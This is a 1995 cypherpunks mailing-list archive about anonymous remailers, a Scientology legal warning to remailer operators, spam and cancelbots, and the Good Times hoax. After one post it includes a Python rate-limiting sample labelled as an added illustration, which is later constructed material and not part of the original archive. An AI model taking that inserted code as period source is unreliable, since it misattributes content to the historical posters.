"Our chief weapon was surprise", and of course Fear, Uncertainty, and Doubt.
The most effective thing they could do would be to deploy a digital
signature system that you _have_ to use to pay your company taxes
or file your individual tax returns on-line, and go from there
to requiring it for other business transactions with the government.
Subsidized servers, of course.  It's worked with Social Security Numbers,
and if they control on-line signatures for business, then they can
control access to the nets for a large fraction of the population.
Along with it, require that banks use the signatures for electronic banking,
which is a bit easier since banks are heavily regulated and the
Federal Reserve would probably be happy to help.
Besides, it gives the Post Office something to do in a post-paper world.

They obviously can't prevent piggyback networks, but they _can_ make
it economically infeasible for medium-large companies to run them.
For instance, declaring internet providers to be common carriers,
and doing a "digital telephony bill" to require them to use
IPng authentication on packets and traceable headers on news and
email systems, with the risk of de-licensing and confiscation
for non-conformists.  It's nice that the largest backbone provider
is now NOT the NSFnet, but a commercial provider (though I'd obviously
prefer AT&T  to Sprint+MCI :-), but they're still the Phone Company,
and could be forced to accept regulation.

Meanwhile, at the user end, the Enemy could start using confiscation
on any computers caught running remailers or encryption -
even if they can't stop us Nasty Evil Black-Marketeering K0deZ Dealers,
they could make it too risky to do at work or school,
which means your own money is on the line if you get caught
calculating in the Black Numbers.  I doubt they'll be able to
ban convicted lawbreakers from using computers entirely
for much longer (heck, I wouldn't be able to use my microwave
oven any more, much less drive my car), but they could still try.

			Bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 3 Jan 95 19:02:58 PST
To: cypherpunks@toad.com
Subject: Re: Why I have a 512 bit PGP key
In-Reply-To: <9501031809.AA21532@elysion.iaks.ira.uka.de>
Message-ID: <Pine.SUN.3.91.950104140321.7300D-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Hadmut Danisch wrote:

[ On smart compilers ]

> It's enough to recognize DES tables or PGP procedures.

And common benchmarks, such as Eratosthenes' Sieve...

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enki of Enridu <elkinsd@teleport.com>
Date: Wed, 4 Jan 95 14:10:47 PST
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Stegno for Kids
In-Reply-To: <Pine.ULT.3.91.950103140953.24233A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SUN.3.91.950104140723.886C-100000@linda.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Robert A. Hayden wrote:

> On Tue, 3 Jan 1995, Hadmut Danisch wrote:
> There was also this thing where you would get these books and a magic 
> marker, and then you would do puzzles in the book, and use the pen to 
> develop the answer.
> 
> The old Infocom hint books also used a similar setup.

I remember those. The hints would range in order of how desperate the 
player was. That was almost as much fun as the game...

David Elkins




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Wed, 4 Jan 95 14:42:04 PST
To: db@Tadpole.COM
Subject: Re: Siegel and Lewis
Message-ID: <9501042243.AA25793@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



Why is it that so many cypherpunks like the economist?

I learned recently that Eric is a big fan. So am I. You're certainly
not the first other cypherpunk to mention this. Weird. I mean, it's
not exactly a radical publication... it just gets its *&#$*#$ facts
right. Probably this is it.
...................................................

I like it for its classy, stylish prose.
And the fact that it presents an economic perspective on world events.

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 4 Jan 95 14:47:32 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: Siegel and Lewis
In-Reply-To: <ab30c81703021004a6f1@[132.162.201.201]>
Message-ID: <Pine.3.89.9501041410.A15563-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Jan 1995, Jonathan Rochkind wrote:
> In a rather disjointed sort of way, that makes it easy to believe the
> article was mangled somewhat in editing. Perhaps they rearranged it to put
> the "sensational" fear-mongering stuff first.  Which is unfortunate, and

One of the top points was "experts say ....".   Journalists 
do not quote anonymous "experts" on controversial stuff 
unless they have marching orders from above.  It is a 
violation of the standard rules of journalism.  You are 
always supposed to identify the person allegedly speaking.   

"Experts say .." is like "Highly placed sources ...".   You know an 
official lie issued by the appropriate department of lies is
about to follow when you see those words.

This article was no accident of sloppy thinking and editing.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Wed, 4 Jan 95 13:45:48 PST
To: cypherpunks@toad.com
Subject: Re: warning letter from...
Message-ID: <m0rPdWs-0004IOC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


Speaking of Scientology...

Forwarded message:
> Newsgroups: rec.humor.funny
> Subject: Do we face Mount St. Helens twice a day?
> From: wb8foz@netcom.com (David Lesher)
> Keywords: topical, funny, parody, computers
> Approved: funny@clarinet.com
> Message-ID: <S7ae.2a78@clarinet.com>
> Date: Wed, 4 Jan 95 12:20:02 EST
> 
> AP:	BILL TAKES ON ORAL & JIM
> 	
> 	Bill Gates, Incorporated announced that the Corporation has
> 	purchased a controlling interest in the Church of Scientology,
> 	effective today. The amount of the transaction was not
> 	disclosed.
> 
> 	A corporate spokesman reading from a prepared text called
> 	"premature" reports that the next version of the company's
> 	mainstay product, referred to as "Windows_2001" in the trade
> 	press, will incorporate an E-meter pop-up box.
> 
> 	The spokesman did vehemently deny that BGI had really intended
> 	to purchase the Roman Catholic Church, but had drafted the
> 	contract with Microsoft Word on a Pentium, thus causing the
> 	error.
> 
> 	"We got what we wanted. We see a great potential in the
> 	Church's auditing techniques, and plan to use them to
> 	investigate methods of producing more uniform structured
> 	thoughts, err, code."
> 
> 	BGI is privately held.
> 	RCC stock closed down 1/8, in light trading.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bshantz@spry.com
Date: Wed, 4 Jan 95 14:48:48 PST
To: cypherpunks@toad.com
Subject: The Good Times virus ...
Message-ID: <199501042250.OAA01990@homer.spry.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey folks,
	Remember the AOL Good Times virus?  Well, we just got some mail here 
at SPRY warning us about it.  I laughed rather hard.  Anyway, I told the guy 
who sent the mail that I would send him a number of pieces of documentation 
about the fact it's a hoax.  There was a NASA newsletter a few months back 
about it.  I deleted it, because I thought I'd never need it again.  
	Does anyone know where I might get a copy of that or another press 
release about the Good Times hoax?
	I'd appreciate any help.  Thanks,

Brad

>>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<<
Brad Shantz                      bshantz@spry.com
Senior Software Engineer
SPRY Inc.                        Direct #:     (206)-442-8251
Seattle, WA 98104                WWW URL: http://WWW.SPRY.COM
----------------------------------------------------------------------
PGP Public Key at:    http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or email:             pgp-public-keys@pgp.ai.mit.edu Subj: GET bshantz
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Wed, 4 Jan 95 14:05:43 PST
To: cypherpunks@toad.com
Subject: Re: who?
In-Reply-To: <199501042110.NAA27459@jobe.shell.portal.com>
Message-ID: <Edn2laa0iYxF076yn@ouray.denver.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 4 Jan 1995 13:10:45 -0800, anonymous-remailer@shell.portal.com wrote:

>  ps, how come mail i send to jpiunix.com is getting bounced, are they down?

Regrettably, it appears jpunix.com is down permanently.  I can't fault John
at all, and want to thank him for running a robust remailer for as long as
he was able.  I captured this earlier today:
=============================================================================
From: perry@jpunix.com (John A. Perry)
Newsgroups: alt.privacy.anon-server,alt.anonymous
Subject: Re: Jpunix "unknown"?
Date: 4 Jan 1995 06:55:22 -0600
Organization: J. P. and Associates

In article <doumakesD1v7EA.C63@netcom.com>,
Don Doumakes <doumakes@netcom.com> wrote:
>I've gotten several pieces of mail returned from jpunix.  Is it down
>permanently, or is this just a temporary problem?

Here is the test of a message I sent to remailer-operators:

The anonymous remailer at jpunix.com is going to shut down 
permanently shortly after I send this message. I spent my holidays 
fighting spams, running out of disk space because of spams and people 
sending HUGE binaries, and running out of swap space.

I have come to the ultimate conclusion that the Internet is not
mature or developed enough for remailers. The intended purpose has been
completely ignored while abuse is growing almost geometrically on a daily
basis. I have concluded that running a remailer on the Internet is like
giving a bunch of terrorists a nuclear bomb and then telling them "But
only use it for good!". There just doesn't seem to be much point in
thrashing my disks and computer to aid somebody in net abuse. I hardly
ever (never) see any use of the remailer for the purposes it was intended. 

BTW as I type this, mailgate.mail.aol.com is hammering my port 25 every 
30 seconds. The contents of the spam being passed thru my system 
essentially says:

          THIS IS A MAIL BOMB!!
          **** BOOM ***
=============================================================================

Alan Westrope                  <awestrop@nyx.cs.du.edu>
__________/|-,                 <adwestro@ouray.denver.colorado.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwsa7VRRFMq4NZY5AQEC7QP/SsfagBISP7k+0en0MeJpTPD56BNv0xGX
Fh80FuzJ/8Ya7Z4ykz8C1zTtXUaKJeIMgGbQkwybYveOGY5eZWgkc62r+FjmW6fh
JY2WhI7e0w+NpfjLBktr+deBvy3b9ElXfbiObfftZMZX/yVke7KX7p7hhdK8t7/g
vVj+TqEMhGU=
=GnaX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Wed, 4 Jan 95 13:22:59 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: regards to legal attempt to stifle remailers
In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl>
Message-ID: <Pine.3.89.9501041555.E175-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain



After reading the post from the Scientologists about locking out groups 
from anon-remailers, I was thinking a little bit, note I said a little bit, 
this isn't a fully fleshed out idea yet.  I was thinking it may be smart 
for some of the remailers to lock out the groups, in particular those 
operators who do it from a student account, or perhaps from their own 
account in the United States where legal action would be able to reach 
them.  But to get around this, the anon users can use the Finland server, 
or a new and improved anon-remailer.  By shopping around for ISPs it is 
possible to find a provider who takes payment thru mail and doesn't 
require positive ID to set up an account.  With this you then either run 
that account as the remailer, a totally anon account not linked to your 
person and thus immune from legal actions (besides having it closed by the 
ISP if they are pressured) or you can run a SLIP connection and run a 
remailer much like Julf's on your own machine thru a dedicated SLIP line. 
 


i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 4 Jan 95 15:24:17 PST
To: cypherpunks@toad.com
Subject: Re: who?
Message-ID: <199501042324.PAA14631@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


 i'm sorry to hear the jpunix remailer is down for good--  why can't
people learn to be more fuckin responsible! i guess this is just yet
another inconvenience we can thank terrorists for and those aol-holes!


   anybody know the email address of the good samaritans?

tia




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bshantz@spry.com
Date: Wed, 4 Jan 95 15:45:24 PST
To: cypherpunks@toad.com
Subject: Re: The Good Times virus ...
Message-ID: <199501042346.PAA03355@homer.spry.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to the people who've sent me copies of the CIAC announcement.  That 
should cover my needs for right now.

Hopefully I can convince these people not to worry.

-- brad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Avi Harris Baumstein <avi@clas.ufl.edu>
Date: Wed, 4 Jan 95 12:46:33 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl>
Message-ID: <199501042047.PAA06797@cutter.clas.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain



nobody writes a very nice, non-confrontational and well thought out
letter supporting his case (and ignoring the oddness of copyrighting
religious materials). but i have some questions that weren't discussed
when i took business law 101 a few years ago:

nobody@replay.com (Name withheld on request) writes:

>     applicable.    Damages  and  an  injunction  against  further
>     unauthorized copying and distribution may be obtained against
>     infringers and, all unauthorized copies and all materials and
>     equipment by which the unauthorized copies may be  reproduced
>     can   be   impounded.    Unauthorized   disclosure   of   the
>     confidential  Advanced  Technology  materials  also  violates
>     applicable trade secrets laws.

i know there has been much chatter on this subject, but are there
truly any precedents that could hold on the anonymous distribution of
copyrighted material? are remailer-ops truly in legal danger?  what
exactly constitutes a trade secret, and what sort of laws apply?

>    clients'  property   rights.    Courts   are   holding   such
>    contributory  infringers  liable.   Two  examples  are:  Sega
>    Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
>    Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
>    1152 (M.D.  Fla.  1993).

what of these cases? is this just an example of typical lawyerly
intimidation tactics? how do you remailer-ops plan to react? my first
instinct (were i running a remailer) would be to ignore it, on grounds
that i wouldn't examine any mail passing through. but if there really
were valid precedent in this matter... (has anyone seen any
well-written lay-person evaluations of the steve jackson case? i read
the ruling, but much of it went in one eye and out the other).

i think the censorship thing is building steam, and we should start
preparing (and informing) ourselves...

-avi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 3 Jan 95 21:06:46 PST
To: cypherpunks@toad.com
Subject: Re: San Francisco Editorial
In-Reply-To: <Pine.SUN.3.91.950103221256.28053B-100000@unix3.netaxs.com>
Message-ID: <Pine.SUN.3.91.950104160400.9369A-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Michael Handler wrote:

> 	Dick Depew and AARM (Auto-Active Retro Moderation). He wanted to 
> cancelbot any posting from anon.penet.fi in the Big Seven Usenet hierarchies.
> He was promptly beaten down by the net. Feh.

He was also the one who presented a convincing argument that the one
who posted the alleged transcript was none other than Julf himself; he
(Dick) was getting responses from the perpetrator faster than the
delayed-response mechanism would have allowed...

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Thu, 5 Jan 95 00:25:20 PST
To: cypherpunks@toad.com
Subject: Remailers, law and the Church of Scientology
Message-ID: <199501050035.AA02970@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Avi Harris Baumstein writes:

>>    clients'  property   rights.    Courts   are   holding   such
>>    contributory  infringers  liable.   Two  examples  are:  Sega
>>    Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
>>    Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
>>    1152 (M.D.  Fla.  1993).

>what of these cases? is this just an example of typical lawyerly
>intimidation tactics?

Neither case is particularly similar to the remailer situation.
_Maphia_ concerned a business which sold $350 boxes to copy
SEGA programs from and to ROM cartridges; they also sold access
to their BBS which held unlicensed copies of SEGA games. The
court held that the copying devices had no purpose other than to
contribute to infringement, and that when SEGA programs were 
uploaded to the BBS, the upload was made with the knowledge of the
defendants. _Frena_ involved a BBS operator who made copyrighted
pictures from Playboy available on his BBS; Playboy trademarks
were removed from the pictures prior to posting. Access to the
BBS was only available to people who paid for access, or who
otherwise did business with the defendant. The court's discussion
about the defendant's mental state in _Frena_ consists of a 
single sentence, and a cite to Jay Dratler, Jr., "Intellectual
Property Law: Commercial Creative, and Industrial Property",
$ 6.01[3] at 6-15(1991). The court seems to be addressing direct,
not contributory infringement. (I don't have Dratler available
easily right now so I dunno what it says.)

_Maphia_ does cite text from _Casella v. Morris_ 820 F.2d 362 (11th
Cir. 1987): "'[o]ne who, with knowledge of the infringing activity,
induces, causes or materially contributes to the infringing conduct
of another' may be held liable as a contributory infringer." (quoting
from _Gershwin Publishing Corp. v. Columbia Artists Management, Inc._,
443 F.2d 1159,1162 (2nd Cir. 1971).

I don't think the cases cited stand for what the Church's attorney
says they stand for. I'm not convinced that the "contributory 
infringement" doctrine can be reasonably applied to remailer 
operators; and I'm not sure that remailer operators have the sort
of mental state (knowledge) required to create liability. The
letter to operators may be part of a strategy to establish 
knowledge of the potential for misuse, to later prevent 
operators from claiming a lack of knowledge. I'm not sure that
a vague warning "someone might use your service to infringe
a copyright" is strong enough to establish that sort of knowledge.
As a remailer operator, I don't see a good way to eliminate
infringing uses without also eliminating non-infringing uses;
the crazy politics around this Scientology stuff makes it seem
like the perfect place for people to use remailers. 

I also think the non-commercial and political nature of postings
to the Scientology groups may make a fair-use analysis turn out
differently than in _Maphia_ and _Frena_; both defendants tried
a fair use argument, and both lost. 

On the other hand, I'm a law student, not an attorney, and the
person who wrote that letter certainly knows more about law in
general and about copyright than I do. I may be totally hosed.

Coincidentally or not, I had a long chat today with the sysadmin
of the system immediately upstream from mine. He said, out of
the blue, "So .. you run a remailer?". In the past he has been
privacy-friendly and anon-friendly, and seems to remain so 
today, but the timing was a little peculiar. I explained about
the remailers and told him how to get Raph's list and about
alpha.c2.org and all the rest of it. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLws+TH3YhjZY3fMNAQEpmgP+JnIZKmdzLWx3P8fMVO0v1pEZ33lrlHHe
FLZBnk59rDXZBomFhprlZAs65ERmKBbugXRJYkPhFA7aKYqcmpquGj6BqWp0oTul
SjHS3OWpsDJhPVEWzt5uOhlV5WrDdhqUWgrI9hN1nfLHnD/Y2NGvPPUt4J2Web/H
uD9htAdxH8o=
=U4oG
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Wed, 4 Jan 95 15:21:02 PST
To: adwestro@ouray.Denver.Colorado.EDU (Alan Westrope)
Subject: Remailer Abuse
In-Reply-To: <Edn2laa0iYxF076yn@ouray.denver.colorado.edu>
Message-ID: <9501042320.AA07624@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain



The problem with a _free_ remailer is obvious -- like many
other Internet resources, it can suffer from the tragedy of
the commons. 

Even a negligible fee would do much to prevent gross remailer
abuse. It may not be feasible to make remailers into an
industry, but this isn't the point -- it will keep the utterly
lame from using it for pranks and their ilk.
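
An added illustration of the fee idea in the message above, not part of the original post and not any remailer's actual code: a small free allowance per sender, with traffic beyond it debited from prepaid credit. The sender keys, size cap, allowance, window and price are all assumptions, and the traffic is constructed.

```python
"""Metered admission for a mail-forwarding service (constructed example)."""
import math
from dataclasses import dataclass
from typing import Dict, NamedTuple

# All limits below are assumed values chosen for the illustration.
MAX_MESSAGE_BYTES = 64 * 1024      # refuse very large binaries outright
FREE_BYTES_PER_WINDOW = 32 * 1024  # free allowance per sender per window
WINDOW_SECONDS = 24 * 3600         # accounting window
PRICE_PER_KIB = 1                  # fee in arbitrary prepaid credit units


class Decision(NamedTuple):
    accepted: bool
    reason: str   # "free", "paid", "over-quota" or "oversize"
    cost: int     # credit units charged (or that would have been needed)


@dataclass
class Account:
    window_start: float
    free_used: int = 0   # free bytes consumed in the current window
    credit: int = 0      # prepaid units remaining


class Meter:
    def __init__(self) -> None:
        self.accounts: Dict[str, Account] = {}

    def _account(self, sender: str, now: float) -> Account:
        acct = self.accounts.get(sender)
        if acct is None:
            acct = self.accounts[sender] = Account(window_start=now)
        elif now - acct.window_start >= WINDOW_SECONDS:
            # New window: the free allowance renews, prepaid credit carries over.
            acct.window_start, acct.free_used = now, 0
        return acct

    def deposit(self, sender: str, units: int, now: float) -> None:
        if units <= 0:
            raise ValueError("deposit must be positive")
        self._account(sender, now).credit += units

    def admit(self, sender: str, size: int, now: float) -> Decision:
        # Oversize mail is refused before any per-sender state is touched.
        if size > MAX_MESSAGE_BYTES:
            return Decision(False, "oversize", 0)
        acct = self._account(sender, now)
        free_left = FREE_BYTES_PER_WINDOW - acct.free_used
        billable = max(0, size - free_left)
        cost = math.ceil(billable / 1024) * PRICE_PER_KIB
        if cost > acct.credit:
            # Refused messages consume neither allowance nor credit.
            return Decision(False, "over-quota", cost)
        acct.free_used += size - billable
        acct.credit -= cost
        return Decision(True, "paid" if cost else "free", cost)


def replay(meter: Meter, events):
    """Feed (seconds, sender, size_bytes) events; return {sender: [accepted, refused]}."""
    tally: Dict[str, list] = {}
    for now, sender, size in sorted(events):
        decision = meter.admit(sender, size, now)
        tally.setdefault(sender, [0, 0])[0 if decision.accepted else 1] += 1
    return tally


# Constructed traffic: an occasional correspondent, one host delivering
# every 30 seconds, and a single very large binary.
SAMPLE = (
    [(i * 3600, "chatty@example.org", 2048) for i in range(5)]
    + [(i * 30, "bomber@example.net", 2048) for i in range(200)]
    + [(10, "binary@example.com", 1_000_000)]
)

if __name__ == "__main__":
    for sender, (ok, refused) in replay(Meter(), SAMPLE).items():
        print(f"{sender:22s} accepted={ok:3d} refused={refused:3d}")
```
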




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 4 Jan 95 13:45:21 PST
To: Hal <cypherpunks@toad.com
Subject: Re: San Francisco Editorial
Message-ID: <ab30c5b8010210041844@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:44 PM 01/03/95, Hal wrote:
>The scary thing about cancels is that some proposals have actually been
>directed at anonymous posts themselves.  Someone anonymously posted
>what purported to be a grisly transcript of the last seconds of the
>doomed Challenger crew as they fell to the ocean.  This caused a great
>hue and cry and some calls for banning anonymous posts and/or
>retroactively cancelling them.  This led to some very amusing events
>which Detweiler has chronicled in his FAQ on anonymity, the net result
>of which was that the idea was discredited.  But the emergence of
>CancelMoose is not an altogether positive event in my view.

I too have mixed feelings about CancelMoose.  But it must be noted, that
while it's possible for CancelMoose to be used for Evil Purposes, it
hasn't.  This isn't a trivial point.  The net collectively (well, it wasn't
really collective, but I suggest if this individual anonymous CancelMoose
hadn't existed, someone else would have done it) responded to something
that it's nearly universally agreed upon is bad; C&S-style spamming.  That
is an example of an anarchist non-hierarchical system _working_, despite the
lack of rules.  And the widespread cancelling of anonymous posts, or posts
from communists or whatever, _hasn't_ happened.  And if someone tried it, I
bet it wouldn't work for long, something would be done to stop it.  An
anti-cancelbot that reposts anything cancelled by the Evil Censoring
Cancelbots, or something.  (Why haven't C&S thought of this themselves?
Would really create havoc with all the cancels and anti-cancels and
re-cancels, etc.)

I don't think Martha Siegel really understands what's going on (not a
surprise).  She is speaking out against a lawless anarchist net, and saying
we need more rules.  Because she's mad at people cancelling her posts,
mainly.  But it seems completely obvious that if we _did_ have rules, they
would prohibit the kind of really horrible spams she and her husband have
been undertaking.  Because 99.99% of the net agrees that those spams are
really bad.

But, like I said, such rules aren't even necessary.  The net collectively
reacts. And there will be a counter reaction, C&S will figure out how to
get around the cancelbots, or the cancelbots will be used for Evil, or
whatever. But I believe firmly that that would cause yet another counter
reaction of some kind. And so on and so on. The net will stay at
equilibrium.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 4 Jan 95 13:46:49 PST
To: cypherpunks@toad.com
Subject: Re: Siegel and Lewis
Message-ID: <ab30c81703021004a6f1@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:22 PM 01/03/95, Raph Levien wrote:
>   His piece that ran Saturday was badly mangled by the editorial
>process, especially since it ran on page one. Those articles get to be
>mangled by a whole new set of people who otherwise wouldn't get to
>touch it. I think Lewis has basically good intentions, and does do his
>homework before writing a story.

Yeah, I encourage everyone to actually _finish_ reading that article before
putting Lewis on your permanent hate list.  I almost put it down in
disgust, from the stuff on page 1, but if you turn to where the article is
continued, it becomes quite a bit more balanced and less fear-mongering.
In a rather disjointed sort of way, that makes it easy to believe the
article was mangled somewhat in editing. Perhaps they rearranged it to put
the "sensational" fear-mongering stuff first.  Which is unfortunate, and
perhaps intentional, because most people probably won't make it to the end
of the article, and if they do, will have been pre-biased by the initial
paragraphs, especially if this is the first they've heard of the subject.
But I don't have too much trouble believing that all blame belongs on the
editors, and not Lewis. :)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name withheld on request)
Date: Wed, 4 Jan 95 08:00:03 PST
To: cypherpunks@toad.com
Subject: Warning letter from Co$. [any comments ?]
Message-ID: <199501041600.AA07488@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



                                               January 3, 1995


     TO: INTERNET REMAILER OPERATORS


     FROM:  THOMAS M. SMALL
            COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
            PUBLICATIONS, INC.

          I  represent  Religious Technology Center ("RTC"), which
     owns the unpublished, confidential Advanced Technology of the
     religion of Scientology, and holds exclusive rights under the
     copyrights applicable to the Advanced  Technology  materials.
     I  also  represent Bridge Publications, Inc., which holds the
     exclusive  right  to  print,   publish   and   sell   various
     non-confidential  works  by  the  founder  of the Scientology
     religion,  L.   Ron  Hubbard,  and  to   make   and   publish
     compilations and derivative works of and from those works and
     to enforce all rights in them.

          It  has  come  to  my  attention  that  there  are   two
     alternate  newsgroups  on  the  Internet to which individuals
     have  been  anonymously  posting  certain  of  my   clients'
     published  and  unpublished  copyrighted materials, including
     certain of the confidential  Advanced  Technology  materials.
     These  confidential  materials  being posted were stolen from
     my client.  There is reason to  believe  that  the  materials
     which  are  uploaded by these users may also be downloaded by
     other users, and  that  these  activities  may  be  occurring
     through  the  systems  which  are  linked  into the Internet.
     The two newsgroups  into  which  these  materials  are  being
     copied    are   alt.technology.clearing   and   alt.religion.
     Scientology.

          We  request your assistance in dealing with the problem.
     The spread of  infringements  and  misappropriations  by  the
     users  will be lessened if you lock out from your systems the
     two   newsgroups   involved,   alt.religion.scientology   and
     alt.technology.clearing, limiting the potential for reposting
     and downloading.  It will then be easier  to  deal  with  the
     intentional infringers through appropriate channels.

          Both  the  uploading  and downloading of these materials
     constitute  unauthorized  copying  and  distribution  of  the
     materials  in  violation  of our clients' rights under United
     States copyright laws and the law of other  countries,  where
     applicable.    Damages  and  an  injunction  against  further
     unauthorized copying and distribution may be obtained against
     infringers and, all unauthorized copies and all materials and
     equipment by which the unauthorized copies may be  reproduced
     can   be   impounded.    Unauthorized   disclosure   of   the
     confidential  Advanced  Technology  materials  also  violates
     applicable trade secrets laws.

          Action  is  being  taken directly with the systems users
     who we know are primarily responsible for these violations of
     my clients' rights.  We hope those actions will put an end to
     the infringements by  these  users.   We  do  {not}  wish  to
     involve  others in  litigation.  Unfortunately, however, such
     actions will  be  unavoidable  where  there  is  contributory
     infringement  by  those who knowingly induce or contribute to
     the infringing conduct of these users by providing facilities
     or systems that enable the  direct  infringers  to  infringe,
     because  we  legally  must  take  all  actions to protect our
     clients'  property   rights.    Courts   are   holding   such
     contributory  infringers  liable.   Two  examples  are:  Sega
     Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
     Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
     1152 (M.D.  Fla.  1993).

          Recent   proposed   legislation   regarding    potential
     liability   of  systems  operators  and  others  who  provide
     facilities or services, such  as  anonymous  remailers,  for
     information  passing through their systems has understandably
     created concern  on  the  part  of  systems  operators  as  a
     potential  liability.   We  ask  your voluntary assistance in
     dealing with these known wilful infringers  so  that  we  can
     both  deal  with the problem without legal hassles, and legal
     liability can be confined to those who intend to  create  the
     situation.

          We  ask that you confirm that you have blocked access to
     these newsgroups through your remailer.  If you are unwilling
     to  do  so,  we  ask that you inform us as to the reasons for
     your position.

                                             Sincerely,



                                             Thomas M. Small




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 4 Jan 95 17:30:07 PST
To: entropy@IntNet.net (Jonathan Cooper)
Subject: Outlawing Anonymity
In-Reply-To: <Pine.SV4.3.91.950104191626.17118E-100000@xcalibur>
Message-ID: <199501050126.RAA01575@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Cooper wrote:
> 
> > Criminalize anonymity, and tell the internet providers to figure
> > out how to enforce it or face confiscation.
> 
